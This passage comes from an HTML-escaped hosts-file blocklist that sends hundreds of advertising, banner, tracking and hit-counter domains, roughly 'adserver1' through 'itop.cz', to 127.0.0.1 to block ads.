adserver1.shareconnector.com&lt;br /&gt;127.0.0.1 adserver2.mediainsight.de&lt;br /&gt;127.0.0.1 adserver2.popdata.de&lt;br /&gt;127.0.0.1 adserver3.eudora.com&lt;br /&gt;127.0.0.1 adserver4.eudora.com&lt;br /&gt;127.0.0.1 adserversolutions.com&lt;br /&gt;127.0.0.1 adservervv.geizkragen.de&lt;br /&gt;127.0.0.1 adserving.eleven-agency.com&lt;br /&gt;127.0.0.1 adservingcentral.com&lt;br /&gt;127.0.0.1 adsfac.net&lt;br /&gt;127.0.0.1 adshadow.net&lt;br /&gt;127.0.0.1 adsmart.co.uk&lt;br /&gt;127.0.0.1 adsmart.com&lt;br /&gt;127.0.0.1 adsmart.net&lt;br /&gt;127.0.0.1 adsmusic.com&lt;br /&gt;127.0.0.1 adsnew.userfriendly.org&lt;br /&gt;127.0.0.1 adsoftware.com&lt;br /&gt;127.0.0.1 adsoldier.com&lt;br /&gt;127.0.0.1 adsp.ilse.nl&lt;br /&gt;127.0.0.1 adspace.ro&lt;br /&gt;127.0.0.1 adsremote.scripps.com&lt;br /&gt;127.0.0.1 adsrv.iol.co.za&lt;br /&gt;127.0.0.1 adsweb.tiscali.cz&lt;br /&gt;127.0.0.1 adsynergy.com&lt;br /&gt;127.0.0.1 adsystem.tt-forums.net&lt;br /&gt;127.0.0.1 adtech.de&lt;br /&gt;127.0.0.1 adtech.m7z.net&lt;br /&gt;127.0.0.1 adtoma.com&lt;br /&gt;127.0.0.1 adtrade.net&lt;br /&gt;127.0.0.1 adtrading.de&lt;br /&gt;127.0.0.1 adtrak.net&lt;br /&gt;127.0.0.1 adtrix.com&lt;br /&gt;127.0.0.1 adv-banner.libero.it&lt;br /&gt;127.0.0.1 adv.for-ua.com&lt;br /&gt;127.0.0.1 adv.freeonline.it&lt;br /&gt;127.0.0.1 adv.hwupgrade.it&lt;br /&gt;127.0.0.1 adv.isdn.cz&lt;br /&gt;127.0.0.1 adv.surinter.net&lt;br /&gt;127.0.0.1 adv.webmd.com&lt;br /&gt;127.0.0.1 adv.wp.pl&lt;br /&gt;127.0.0.1 adv.yo.cz&lt;br /&gt;127.0.0.1 adv1.videoprofessor.com&lt;br /&gt;127.0.0.1 advariant.com&lt;br /&gt;127.0.0.1 adventory.com&lt;br /&gt;127.0.0.1 adverity.com&lt;br /&gt;127.0.0.1 adverserve.net&lt;br /&gt;127.0.0.1 advert.bayarea.com&lt;br /&gt;127.0.0.1 advert.hi-media.com&lt;br /&gt;127.0.0.1 advert.hu&lt;br /&gt;127.0.0.1 adverticum.com&lt;br /&gt;127.0.0.1 adverticum.net&lt;br /&gt;127.0.0.1 advertiseireland.com&lt;br /&gt;127.0.0.1 advertising.com&lt;br /&gt;127.0.0.1 advertising.se&lt;br /&gt;127.0.0.1 advertisingbanners.com&lt;br /&gt;127.0.0.1 advertmarket.com&lt;br /&gt;127.0.0.1 advertmedia.de&lt;br /&gt;127.0.0.1 advertpro.sitepoint.com&lt;br /&gt;127.0.0.1 adverts.carltononline.com&lt;br /&gt;127.0.0.1 advertserve.com&lt;br /&gt;127.0.0.1 advertwizard.com&lt;br /&gt;127.0.0.1 adview.ppro.de&lt;br /&gt;127.0.0.1 adviva.net&lt;br /&gt;127.0.0.1 advlab.it&lt;br /&gt;127.0.0.1 advnt.com&lt;br /&gt;127.0.0.1 advnt01.com&lt;br /&gt;127.0.0.1 advnt02.com&lt;br /&gt;127.0.0.1 advnt03.com&lt;br /&gt;127.0.0.1 advnt04.com&lt;br /&gt;127.0.0.1 advspot.com&lt;br /&gt;127.0.0.1 adware.hu&lt;br /&gt;127.0.0.1 adwealth.com&lt;br /&gt;127.0.0.1 adweb.integctr.com&lt;br /&gt;127.0.0.1 adworldnetwork.com&lt;br /&gt;127.0.0.1 adworx.at&lt;br /&gt;127.0.0.1 adx.allstar.cz&lt;br /&gt;127.0.0.1 adx.arip.co.th&lt;br /&gt;127.0.0.1 adx.atnext.com&lt;br /&gt;127.0.0.1 adx.nu&lt;br /&gt;127.0.0.1 ady.arip.co.th&lt;br /&gt;127.0.0.1 adz.afterdawn.net&lt;br /&gt;127.0.0.1 affiliate.1800flowers.com&lt;br /&gt;127.0.0.1 affiliate.7host.com&lt;br /&gt;127.0.0.1 affiliate.cfdebt.com&lt;br /&gt;127.0.0.1 affiliate.doubleyourdating.com&lt;br /&gt;127.0.0.1 affiliate.dtiserv.com&lt;br /&gt;127.0.0.1 affiliate.gamestop.com&lt;br /&gt;127.0.0.1 affiliate.grasscity.com&lt;br /&gt;127.0.0.1 affiliate.travelnow.com&lt;br /&gt;127.0.0.1 affiliate.viator.com&lt;br /&gt;127.0.0.1 affiliatefuel.com&lt;br /&gt;127.0.0.1 affiliates.allposters.com&lt;br /&gt;127.0.0.1 affiliates.internationaljock.com&lt;br /&gt;127.0.0.1 affiliatetracking.net&lt;br /&gt;127.0.0.1 affiliplus.de&lt;br /&gt;127.0.0.1 afiliados.submarino.com.br&lt;br /&gt;127.0.0.1 ah-ha.com&lt;br /&gt;127.0.0.1 aim4media.com&lt;br /&gt;127.0.0.1 alladvantage.com&lt;br /&gt;127.0.0.1 amedia.techies.com&lt;br /&gt;127.0.0.1 app.lstdesign.com&lt;br /&gt;127.0.0.1 arc1.msn.com&lt;br /&gt;127.0.0.1 as.cmpnet.com&lt;br /&gt;127.0.0.1 as.fotexnet.hu&lt;br /&gt;127.0.0.1 as1.falkag.de&lt;br /&gt;127.0.0.1 as2.falkag.de&lt;br /&gt;127.0.0.1 as3.falkag.de&lt;br /&gt;127.0.0.1 as4.falkag.de&lt;br /&gt;127.0.0.1 as5000.com&lt;br /&gt;127.0.0.1 asv.gameplanet.co.nz&lt;br /&gt;127.0.0.1 atdmt.com&lt;br /&gt;127.0.0.1 atwola.com&lt;br /&gt;127.0.0.1 audit.median.hu&lt;br /&gt;127.0.0.1 audit.webinform.hu&lt;br /&gt;127.0.0.1 autohits.dk&lt;br /&gt;127.0.0.1 avatarresources.com&lt;br /&gt;127.0.0.1 avenuea.com&lt;br /&gt;127.0.0.1 avres.net&lt;br /&gt;127.0.0.1 awarez.net&lt;br /&gt;127.0.0.1 awrz.net&lt;br /&gt;127.0.0.1 azjmp.com&lt;br /&gt;127.0.0.1 azoogleads.com&lt;br /&gt;127.0.0.1 babs.tv2.dk&lt;br /&gt;127.0.0.1 backbeatmedia.com&lt;br /&gt;127.0.0.1 banerovec.cz&lt;br /&gt;127.0.0.1 banex.cz&lt;br /&gt;127.0.0.1 banik.redigy.cz&lt;br /&gt;127.0.0.1 banman.cz&lt;br /&gt;127.0.0.1 banner.ad.nu&lt;br /&gt;127.0.0.1 banner.buempliz-online.ch&lt;br /&gt;127.0.0.1 banner.casino.net&lt;br /&gt;127.0.0.1 banner.casinodelrio.com&lt;br /&gt;127.0.0.1 banner.coza.com&lt;br /&gt;127.0.0.1 banner.cz&lt;br /&gt;127.0.0.1 banner.easyspace.com&lt;br /&gt;127.0.0.1 banner.elisa.net&lt;br /&gt;127.0.0.1 banner.getgo.de&lt;br /&gt;127.0.0.1 banner.img.co.za&lt;br /&gt;127.0.0.1 banner.inyourpocket.com&lt;br /&gt;127.0.0.1 banner.jobsahead.com&lt;br /&gt;127.0.0.1 banner.kiev.ua&lt;br /&gt;127.0.0.1 banner.linux.se&lt;br /&gt;127.0.0.1 banner.media-system.de&lt;br /&gt;127.0.0.1 banner.mindshare.de&lt;br /&gt;127.0.0.1 banner.musikmedia.de&lt;br /&gt;127.0.0.1 banner.nixnet.cz&lt;br /&gt;127.0.0.1 banner.noblepoker.com&lt;br /&gt;127.0.0.1 banner.northsky.com&lt;br /&gt;127.0.0.1 banner.orb.net&lt;br /&gt;127.0.0.1 banner.penguin.cz&lt;br /&gt;127.0.0.1 banner.relcom.ru&lt;br /&gt;127.0.0.1 banner.rojakpot.com&lt;br /&gt;127.0.0.1 banner.t-online.de&lt;br /&gt;127.0.0.1 banner.tanto.de&lt;br /&gt;127.0.0.1 banner.tpage.com&lt;br /&gt;127.0.0.1 banner.webmersion.com&lt;br /&gt;127.0.0.1 banner4all.dk&lt;br /&gt;127.0.0.1 bannerads.de&lt;br /&gt;127.0.0.1 bannerads.zwire.com&lt;br /&gt;127.0.0.1 bannerbank.ru&lt;br /&gt;127.0.0.1 bannerbox.hu&lt;br /&gt;127.0.0.1 bannerboxes.com&lt;br /&gt;127.0.0.1 bannercommunity.de&lt;br /&gt;127.0.0.1 bannerexchange.cjb.net&lt;br /&gt;127.0.0.1 bannerhost.com&lt;br /&gt;127.0.0.1 bannerhosts.com&lt;br /&gt;127.0.0.1 bannerimage.com&lt;br /&gt;127.0.0.1 bannerlandia.com.ar&lt;br /&gt;127.0.0.1 bannermall.com&lt;br /&gt;127.0.0.1 bannermarkt.nl&lt;br /&gt;127.0.0.1 bannerpower.com&lt;br /&gt;127.0.0.1 banners.adultfriendfinder.com&lt;br /&gt;127.0.0.1 banners.amigos.com&lt;br /&gt;127.0.0.1 banners.arachne.cz&lt;br /&gt;127.0.0.1 banners.asiafriendfinder.com&lt;br /&gt;127.0.0.1 banners.babylon-x.com&lt;br /&gt;127.0.0.1 banners.babylonbucks.com&lt;br /&gt;127.0.0.1 banners.bol.com.br&lt;br /&gt;127.0.0.1 banners.clubseventeen.com&lt;br /&gt;127.0.0.1 banners.czi.cz&lt;br /&gt;127.0.0.1 banners.de.clara.net&lt;br /&gt;127.0.0.1 banners.directnic.com&lt;br /&gt;127.0.0.1 banners.dot.tk&lt;br /&gt;127.0.0.1 banners.easydns.com&lt;br /&gt;127.0.0.1 banners.ebay.com&lt;br /&gt;127.0.0.1 banners.freett.com&lt;br /&gt;127.0.0.1 banners.friendfinder.com&lt;br /&gt;127.0.0.1 banners.friendsfinder.com&lt;br /&gt;127.0.0.1 banners.hetnet.nl&lt;br /&gt;127.0.0.1 banners.internetsexprovider.com&lt;br /&gt;127.0.0.1 banners.iq.pl&lt;br /&gt;127.0.0.1 banners.isoftmarketing.com&lt;br /&gt;127.0.0.1 banners.kfmb.com&lt;br /&gt;127.0.0.1 banners.lifeserv.com&lt;br /&gt;127.0.0.1 banners.linkbuddies.com&lt;br /&gt;127.0.0.1 banners.netcraft.com&lt;br /&gt;127.0.0.1 banners.one2one.com&lt;br /&gt;127.0.0.1 banners.resultonline.com&lt;br /&gt;127.0.0.1 banners.sexsearch.com&lt;br /&gt;127.0.0.1 banners.tucson.com&lt;br /&gt;127.0.0.1 banners.uk.clara.net&lt;br /&gt;127.0.0.1 banners.wunderground.com&lt;br /&gt;127.0.0.1 bannerserver.com&lt;br /&gt;127.0.0.1 bannerserver.gator.com&lt;br /&gt;127.0.0.1 bannersgomlm.com&lt;br /&gt;127.0.0.1 bannersng.yell.com&lt;br /&gt;127.0.0.1 bannerspace.com&lt;br /&gt;127.0.0.1 bannerswap.com&lt;br /&gt;127.0.0.1 bannertesting.com&lt;br /&gt;127.0.0.1 bannieres.acces-contenu.com&lt;br /&gt;127.0.0.1 bans.bride.ru&lt;br /&gt;127.0.0.1 bansrv1.n1media.com&lt;br /&gt;127.0.0.1 barnesandnoble.bfast.com&lt;br /&gt;127.0.0.1 bbmedia.cz&lt;br /&gt;127.0.0.1 bbn.img.com.ua&lt;br /&gt;127.0.0.1 bestsearch.net&lt;br /&gt;127.0.0.1 bidclix.com&lt;br /&gt;127.0.0.1 bidclix.net&lt;br /&gt;127.0.0.1 bigads.guj.de&lt;br /&gt;127.0.0.1 bigbangmedia.com&lt;br /&gt;127.0.0.1 billboard.cz&lt;br /&gt;127.0.0.1 bizad.nikkeibp.co.jp&lt;br /&gt;127.0.0.1 bizban.net&lt;br /&gt;127.0.0.1 blast4traffic.com&lt;br /&gt;127.0.0.1 blazefind.com&lt;br /&gt;127.0.0.1 blogads.com&lt;br /&gt;127.0.0.1 bluehavenmedia.com&lt;br /&gt;127.0.0.1 bluestreak.com&lt;br /&gt;127.0.0.1 bm.annonce.cz&lt;br /&gt;127.0.0.1 bn.bfast.com&lt;br /&gt;127.0.0.1 bnr.volgocity.ru&lt;br /&gt;127.0.0.1 boom.ro&lt;br /&gt;127.0.0.1 bpath.com&lt;br /&gt;127.0.0.1 bravenet.com&lt;br /&gt;127.0.0.1 bridgetrack.com&lt;br /&gt;127.0.0.1 british-banners.com&lt;br /&gt;127.0.0.1 bs.yandex.ru&lt;br /&gt;127.0.0.1 bs001.gmx.net&lt;br /&gt;127.0.0.1 bs002.gmx.net&lt;br /&gt;127.0.0.1 bs003.gmx.net&lt;br /&gt;127.0.0.1 bs004.gmx.net&lt;br /&gt;127.0.0.1 bs005.gmx.net&lt;br /&gt;127.0.0.1 bs006.gmx.net&lt;br /&gt;127.0.0.1 bs007.gmx.net&lt;br /&gt;127.0.0.1 bs008.gmx.net&lt;br /&gt;127.0.0.1 bs009.gmx.net&lt;br /&gt;127.0.0.1 bs010.gmx.net&lt;br /&gt;127.0.0.1 bs011.gmx.net&lt;br /&gt;127.0.0.1 bs012.gmx.net&lt;br /&gt;127.0.0.1 bs013.gmx.net&lt;br /&gt;127.0.0.1 bs014.gmx.net&lt;br /&gt;127.0.0.1 bs015.gmx.net&lt;br /&gt;127.0.0.1 bs016.gmx.net&lt;br /&gt;127.0.0.1 bs017.gmx.net&lt;br /&gt;127.0.0.1 bs018.gmx.net&lt;br /&gt;127.0.0.1 bs019.gmx.net&lt;br /&gt;127.0.0.1 bs020.gmx.net&lt;br /&gt;127.0.0.1 bs021.gmx.net&lt;br /&gt;127.0.0.1 bs022.gmx.net&lt;br /&gt;127.0.0.1 bs023.gmx.net&lt;br /&gt;127.0.0.1 bs024.gmx.net&lt;br /&gt;127.0.0.1 bs025.gmx.net&lt;br /&gt;127.0.0.1 bs026.gmx.net&lt;br /&gt;127.0.0.1 bs027.gmx.net&lt;br /&gt;127.0.0.1 bs028.gmx.net&lt;br /&gt;127.0.0.1 bs029.gmx.net&lt;br /&gt;127.0.0.1 bs030.gmx.net&lt;br /&gt;127.0.0.1 bs031.gmx.net&lt;br /&gt;127.0.0.1 bs032.gmx.net&lt;br /&gt;127.0.0.1 bs033.gmx.net&lt;br /&gt;127.0.0.1 bs034.gmx.net&lt;br /&gt;127.0.0.1 bs035.gmx.net&lt;br /&gt;127.0.0.1 bs036.gmx.net&lt;br /&gt;127.0.0.1 bs037.gmx.net&lt;br /&gt;127.0.0.1 bs038.gmx.net&lt;br /&gt;127.0.0.1 bs039.gmx.net&lt;br /&gt;127.0.0.1 bs040.gmx.net&lt;br /&gt;127.0.0.1 bs041.gmx.net&lt;br /&gt;127.0.0.1 bs042.gmx.net&lt;br /&gt;127.0.0.1 bs043.gmx.net&lt;br /&gt;127.0.0.1 bs044.gmx.net&lt;br /&gt;127.0.0.1 bs045.gmx.net&lt;br /&gt;127.0.0.1 bs046.gmx.net&lt;br /&gt;127.0.0.1 bs047.gmx.net&lt;br /&gt;127.0.0.1 bs048.gmx.net&lt;br /&gt;127.0.0.1 bs049.gmx.net&lt;br /&gt;127.0.0.1 budsinc.com&lt;br /&gt;127.0.0.1 burstnet.akadns.net&lt;br /&gt;127.0.0.1 burstnet.com&lt;br /&gt;127.0.0.1 businessfactory.prospero.com&lt;br /&gt;127.0.0.1 c.bigmir.net&lt;br /&gt;127.0.0.1 c1.nowlinux.com&lt;br /&gt;127.0.0.1 candidclicks.com&lt;br /&gt;127.0.0.1 casalemedia.com&lt;br /&gt;127.0.0.1 casalmedia.com&lt;br /&gt;127.0.0.1 cash4banner.com&lt;br /&gt;127.0.0.1 cash4banner.de&lt;br /&gt;127.0.0.1 cash4popup.de&lt;br /&gt;127.0.0.1 cashfiesta.com&lt;br /&gt;127.0.0.1 cashpartner.com&lt;br /&gt;127.0.0.1 cashpartner.net&lt;br /&gt;127.0.0.1 casinogames.com&lt;br /&gt;127.0.0.1 casinorewards.com&lt;br /&gt;127.0.0.1 casinotraffic.com&lt;br /&gt;127.0.0.1 casinotreasure.com&lt;br /&gt;127.0.0.1 cat.clx.ru&lt;br /&gt;127.0.0.1 cben1.net&lt;br /&gt;127.0.0.1 cbx.net&lt;br /&gt;127.0.0.1 cdn2.adsdk.com&lt;br /&gt;127.0.0.1 centrport.net&lt;br /&gt;127.0.0.1 cgicounter.puretec.de&lt;br /&gt;127.0.0.1 ch.questionmarket.com&lt;br /&gt;127.0.0.1 chart.dk&lt;br /&gt;127.0.0.1 checkm8.com&lt;br /&gt;127.0.0.1 chestionar.ro&lt;br /&gt;127.0.0.1 ciaoclick.com&lt;br /&gt;127.0.0.1 cibleclick.com&lt;br /&gt;127.0.0.1 cityads.telus.net&lt;br /&gt;127.0.0.1 cj.com&lt;br /&gt;127.0.0.1 cjbmanagement.com&lt;br /&gt;127.0.0.1 claria.com&lt;br /&gt;127.0.0.1 click-fr.com&lt;br /&gt;127.0.0.1 click.absoluteagency.com&lt;br /&gt;127.0.0.1 click.fool.co.uk&lt;br /&gt;127.0.0.1 click.fool.com&lt;br /&gt;127.0.0.1 click.go2net.com&lt;br /&gt;127.0.0.1 click2freemoney.com&lt;br /&gt;127.0.0.1 click2paid.com&lt;br /&gt;127.0.0.1 click4click.com&lt;br /&gt;127.0.0.1 clickability.com&lt;br /&gt;127.0.0.1 clickagents.com&lt;br /&gt;127.0.0.1 clickbank.com&lt;br /&gt;127.0.0.1 clickbank.net&lt;br /&gt;127.0.0.1 clickbroker.com&lt;br /&gt;127.0.0.1 clickbrokers.com&lt;br /&gt;127.0.0.1 clickcash.webpower.com&lt;br /&gt;127.0.0.1 clickedyclick.com&lt;br /&gt;127.0.0.1 clickfinders.com&lt;br /&gt;127.0.0.1 clickforwebmasters.com&lt;br /&gt;127.0.0.1 clickhere.foronlinegames.com&lt;br /&gt;127.0.0.1 clickhereforcellphones.com&lt;br /&gt;127.0.0.1 clickhouse.com&lt;br /&gt;127.0.0.1 clickhype.com&lt;br /&gt;127.0.0.1 clickmedia.ro&lt;br /&gt;127.0.0.1 clicks.equantum.com&lt;br /&gt;127.0.0.1 clicks.jackpot.com&lt;br /&gt;127.0.0.1 clicks.mods.de&lt;br /&gt;127.0.0.1 clicks.stripsaver.com&lt;br /&gt;127.0.0.1 clickserve.cc-dt.com&lt;br /&gt;127.0.0.1 clicksor.com&lt;br /&gt;127.0.0.1 clickthrutraffic.com&lt;br /&gt;127.0.0.1 clicktracks.com&lt;br /&gt;127.0.0.1 clicktrade.com&lt;br /&gt;127.0.0.1 clickxchange.com&lt;br /&gt;127.0.0.1 clickz.com&lt;br /&gt;127.0.0.1 clictrafic.com&lt;br /&gt;127.0.0.1 clients.tbo.com&lt;br /&gt;127.0.0.1 clixgalore.com&lt;br /&gt;127.0.0.1 cnt.one.ru&lt;br /&gt;127.0.0.1 cnt1.pocitadlo.cz&lt;br /&gt;127.0.0.1 code-server.biz&lt;br /&gt;127.0.0.1 colonize.com&lt;br /&gt;127.0.0.1 comclick.com&lt;br /&gt;127.0.0.1 commission-junction.com&lt;br /&gt;127.0.0.1 commissionmonster.com&lt;br /&gt;127.0.0.1 commonname.com&lt;br /&gt;127.0.0.1 compactbanner.com&lt;br /&gt;127.0.0.1 comprabanner.it&lt;br /&gt;127.0.0.1 contextclick.com&lt;br /&gt;127.0.0.1 cookies.cmpnet.com&lt;br /&gt;127.0.0.1 cornflakes.pathfinder.com&lt;br /&gt;127.0.0.1 count.rin.ru&lt;br /&gt;127.0.0.1 counted.com&lt;br /&gt;127.0.0.1 counter.bloke.com&lt;br /&gt;127.0.0.1 counter.cnw.cz&lt;br /&gt;127.0.0.1 counter.cz&lt;br /&gt;127.0.0.1 counter.nowlinux.com&lt;br /&gt;127.0.0.1 counter.rambler.ru&lt;br /&gt;127.0.0.1 counter.search.bg&lt;br /&gt;127.0.0.1 counter.times.lv&lt;br /&gt;127.0.0.1 counter.webtrends.net&lt;br /&gt;127.0.0.1 counter.yadro.ru&lt;br /&gt;127.0.0.1 counters.honesty.com&lt;br /&gt;127.0.0.1 counts.tucows.com&lt;br /&gt;127.0.0.1 coupling-media.de&lt;br /&gt;127.0.0.1 crazypopups.com&lt;br /&gt;127.0.0.1 creative.whi.co.nz&lt;br /&gt;127.0.0.1 creatives.as4x.tmcs.net&lt;br /&gt;127.0.0.1 cserver.mii.instacontent.net&lt;br /&gt;127.0.0.1 ctnetwork.hu&lt;br /&gt;127.0.0.1 ctxtads.overture.com&lt;br /&gt;127.0.0.1 custom-click.com&lt;br /&gt;127.0.0.1 customad.cnn.com&lt;br /&gt;127.0.0.1 cyberbounty.com&lt;br /&gt;127.0.0.1 cybercount.com&lt;br /&gt;127.0.0.1 cybereps.com&lt;br /&gt;127.0.0.1 cybermonitor.com&lt;br /&gt;127.0.0.1 cydoor.com&lt;br /&gt;127.0.0.1 datingadvertising.com&lt;br /&gt;127.0.0.1 dbbsrv.com&lt;br /&gt;127.0.0.1 dcad.tnn.net&lt;br /&gt;127.0.0.1 dclk.net&lt;br /&gt;127.0.0.1 de.rottentomatoes.com&lt;br /&gt;127.0.0.1 dealhelper.com&lt;br /&gt;127.0.0.1 default-homepage-network.com&lt;br /&gt;127.0.0.1 deloo.de&lt;br /&gt;127.0.0.1 desktop.kazaa.com&lt;br /&gt;127.0.0.1 dgm2.com&lt;br /&gt;127.0.0.1 dgmaustralia.com&lt;br /&gt;127.0.0.1 dialerporn.com&lt;br /&gt;127.0.0.1 didtheyreadit.com&lt;br /&gt;127.0.0.1 digits.com&lt;br /&gt;127.0.0.1 direct-revenue.com&lt;br /&gt;127.0.0.1 direct.lbe.ru&lt;br /&gt;127.0.0.1 directleads.com&lt;br /&gt;127.0.0.1 directtrack.com&lt;br /&gt;127.0.0.1 directwebsearch.net&lt;br /&gt;127.0.0.1 discountclick.com&lt;br /&gt;127.0.0.1 divicash.com&lt;br /&gt;127.0.0.1 dnads.directnic.com&lt;br /&gt;127.0.0.1 domainsponsor.com&lt;br /&gt;127.0.0.1 domainsteam.de&lt;br /&gt;127.0.0.1 doubleclic.com&lt;br /&gt;127.0.0.1 doubleclick.com&lt;br /&gt;127.0.0.1 doubleclick.de&lt;br /&gt;127.0.0.1 doubleclick.net&lt;br /&gt;127.0.0.1 drinkmy.com&lt;br /&gt;127.0.0.1 dw.com.com&lt;br /&gt;127.0.0.1 e-bannerx.com&lt;br /&gt;127.0.0.1 e2give.com&lt;br /&gt;127.0.0.1 eadexchange.com&lt;br /&gt;127.0.0.1 eads.com&lt;br /&gt;127.0.0.1 ecoupons.com&lt;br /&gt;127.0.0.1 elitetoplist.com&lt;br /&gt;127.0.0.1 emarketer.com&lt;br /&gt;127.0.0.1 emarketmakers.com&lt;br /&gt;127.0.0.1 engage.everyone.net&lt;br /&gt;127.0.0.1 engage.omaha.com&lt;br /&gt;127.0.0.1 engine.awaps.net&lt;br /&gt;127.0.0.1 engine.espace.netavenir.com&lt;br /&gt;127.0.0.1 enginenetwork.com&lt;br /&gt;127.0.0.1 entercasino.com&lt;br /&gt;127.0.0.1 erotic-ad.com&lt;br /&gt;127.0.0.1 escati.linkopp.net&lt;br /&gt;127.0.0.1 eshopads2.com&lt;br /&gt;127.0.0.1 espotting.com&lt;br /&gt;127.0.0.1 estats.com&lt;br /&gt;127.0.0.1 etracker.de&lt;br /&gt;127.0.0.1 eu-adcenter.net&lt;br /&gt;127.0.0.1 euniverseads.com&lt;br /&gt;127.0.0.1 euro4banner.com&lt;br /&gt;127.0.0.1 europeanbanners.com&lt;br /&gt;127.0.0.1 euros4click.de&lt;br /&gt;127.0.0.1 eusta.de&lt;br /&gt;127.0.0.1 exchange-it.com&lt;br /&gt;127.0.0.1 exchange.bg&lt;br /&gt;127.0.0.1 exchangead.com&lt;br /&gt;127.0.0.1 exchangeclicksonline.com&lt;br /&gt;127.0.0.1 exit76.com&lt;br /&gt;127.0.0.1 exitexchange.com&lt;br /&gt;127.0.0.1 exitfuel.com&lt;br /&gt;127.0.0.1 ext4.price.ru&lt;br /&gt;127.0.0.1 extreme-dm.com&lt;br /&gt;127.0.0.1 eyeblaster-bs.com&lt;br /&gt;127.0.0.1 eyeblaster.com&lt;br /&gt;127.0.0.1 eyewonder.com&lt;br /&gt;127.0.0.1 ezula.com&lt;br /&gt;127.0.0.1 f1organizer.com&lt;br /&gt;127.0.0.1 falkag.de&lt;br /&gt;127.0.0.1 falkag.net&lt;br /&gt;127.0.0.1 fast-adv.it&lt;br /&gt;127.0.0.1 fastclick.com&lt;br /&gt;127.0.0.1 fastclick.com.edgesuite.net&lt;br /&gt;127.0.0.1 fastclick.net&lt;br /&gt;127.0.0.1 fastcounter.bcentral.com&lt;br /&gt;127.0.0.1 feedbackresearch.com&lt;br /&gt;127.0.0.1 ffxcam.fairfax.com.au&lt;br /&gt;127.0.0.1 findcommerce.com&lt;br /&gt;127.0.0.1 findyourcasino.com&lt;br /&gt;127.0.0.1 fineclicks.com&lt;br /&gt;127.0.0.1 first.nova.cz&lt;br /&gt;127.0.0.1 flexbanner.com&lt;br /&gt;127.0.0.1 flowgo.com&lt;br /&gt;127.0.0.1 fmads.osdn.com&lt;br /&gt;127.0.0.1 focalex.com&lt;br /&gt;127.0.0.1 fragmentserv.iac-online.de&lt;br /&gt;127.0.0.1 free-banners.com&lt;br /&gt;127.0.0.1 freebanner.com&lt;br /&gt;127.0.0.1 freelogs.com&lt;br /&gt;127.0.0.1 freestat.pl&lt;br /&gt;127.0.0.1 freestats.com&lt;br /&gt;127.0.0.1 freewebcounter.com&lt;br /&gt;127.0.0.1 *BLEEP*-access.com&lt;br /&gt;127.0.0.1 g-wizzads.net&lt;br /&gt;127.0.0.1 galaxien.com&lt;br /&gt;127.0.0.1 gamblingbanner.com&lt;br /&gt;127.0.0.1 gamehouse.com&lt;br /&gt;127.0.0.1 gator.com&lt;br /&gt;127.0.0.1 gcads.osdn.com&lt;br /&gt;127.0.0.1 gcirm.californianonline.com&lt;br /&gt;127.0.0.1 gemius.pl&lt;br /&gt;127.0.0.1 giftsky.org&lt;br /&gt;127.0.0.1 globaltrack.com&lt;br /&gt;127.0.0.1 go-clicks.de&lt;br /&gt;127.0.0.1 goingplatinum.com&lt;br /&gt;127.0.0.1 gold.weborama.fr&lt;br /&gt;127.0.0.1 goldstats.com&lt;br /&gt;127.0.0.1 googlesyndication.com&lt;br /&gt;127.0.0.1 gorillanation.com&lt;br /&gt;127.0.0.1 gostats.com&lt;br /&gt;127.0.0.1 gp.dejanews.com&lt;br /&gt;127.0.0.1 grafstat.ro&lt;br /&gt;127.0.0.1 herbalaffiliateprogram.com&lt;br /&gt;127.0.0.1 hexusads.fluent.ltd.uk&lt;br /&gt;127.0.0.1 hightrafficads.com&lt;br /&gt;127.0.0.1 hit.bg&lt;br /&gt;127.0.0.1 hit.gemius.pl&lt;br /&gt;127.0.0.1 hit.webcentre.lycos.co.uk&lt;br /&gt;127.0.0.1 hitbox.com&lt;br /&gt;127.0.0.1 hitcents.com&lt;br /&gt;127.0.0.1 hitexchange.net&lt;br /&gt;127.0.0.1 hitfarm.com&lt;br /&gt;127.0.0.1 hitlist.ru&lt;br /&gt;127.0.0.1 hitlogger.com&lt;br /&gt;127.0.0.1 hitlounge.com&lt;br /&gt;127.0.0.1 hitometer.com&lt;br /&gt;127.0.0.1 hits4me.com&lt;br /&gt;127.0.0.1 hitslink.com&lt;br /&gt;127.0.0.1 hotlog.ru&lt;br /&gt;127.0.0.1 hotrank.com.tw&lt;br /&gt;127.0.0.1 hotstatistics.com&lt;br /&gt;127.0.0.1 httpads.com&lt;br /&gt;127.0.0.1 httpool.com&lt;br /&gt;127.0.0.1 humanclick.com&lt;br /&gt;127.0.0.1 hurricanedigitalmedia.com&lt;br /&gt;127.0.0.1 hyperbanner.net&lt;br /&gt;127.0.0.1 hypercount.com&lt;br /&gt;127.0.0.1 i-clicks.net&lt;br /&gt;127.0.0.1 i1img.com&lt;br /&gt;127.0.0.1 iad.liveperson.net&lt;br /&gt;127.0.0.1 iadnet.com&lt;br /&gt;127.0.0.1 idot.cz&lt;br /&gt;127.0.0.1 igads.no.publicus.com&lt;br /&gt;127.0.0.1 ilbanner.com&lt;br /&gt;127.0.0.1 ilead.itrack.it&lt;br /&gt;127.0.0.1 iliillliO00OO0.321.cn&lt;br /&gt;127.0.0.1 image.ugo.com&lt;br /&gt;127.0.0.1 imageads.canoe.ca&lt;br /&gt;127.0.0.1 images.v3.com&lt;br /&gt;127.0.0.1 imaginemedia.com&lt;br /&gt;127.0.0.1 img.bannersxchange.com&lt;br /&gt;127.0.0.1 imonitor.nethost.cz&lt;br /&gt;127.0.0.1 imprese.cz&lt;br /&gt;127.0.0.1 impressionz.co.uk&lt;br /&gt;127.0.0.1 imrworldwide.com&lt;br /&gt;127.0.0.1 inboxdollars.com&lt;br /&gt;127.0.0.1 inc.com&lt;br /&gt;127.0.0.1 indieclick.com&lt;br /&gt;127.0.0.1 industrybrains.com&lt;br /&gt;127.0.0.1 inet-traffic.com&lt;br /&gt;127.0.0.1 infinite-ads.com&lt;br /&gt;127.0.0.1 information.com&lt;br /&gt;127.0.0.1 insightexpress.com&lt;br /&gt;127.0.0.1 instacontent.net&lt;br /&gt;127.0.0.1 instantmadness.com&lt;br /&gt;127.0.0.1 intelliads.com&lt;br /&gt;127.0.0.1 intellitxt.com&lt;br /&gt;127.0.0.1 internet-optimizer.com&lt;br /&gt;127.0.0.1 internetfuel.com&lt;br /&gt;127.0.0.1 interreklame.de&lt;br /&gt;127.0.0.1 ip.ro&lt;br /&gt;127.0.0.1 ireklama.cz&lt;br /&gt;127.0.0.1 is.casalemedia.com&lt;br /&gt;127.0.0.1 itadnetwork.co.uk&lt;br /&gt;127.0.0.1 itbannerexchange.com&lt;br /&gt;127.0.0.1 itfarm.com&lt;br /&gt;127.0.0.1 itop.cz&lt;br /&gt;127.0.0.1 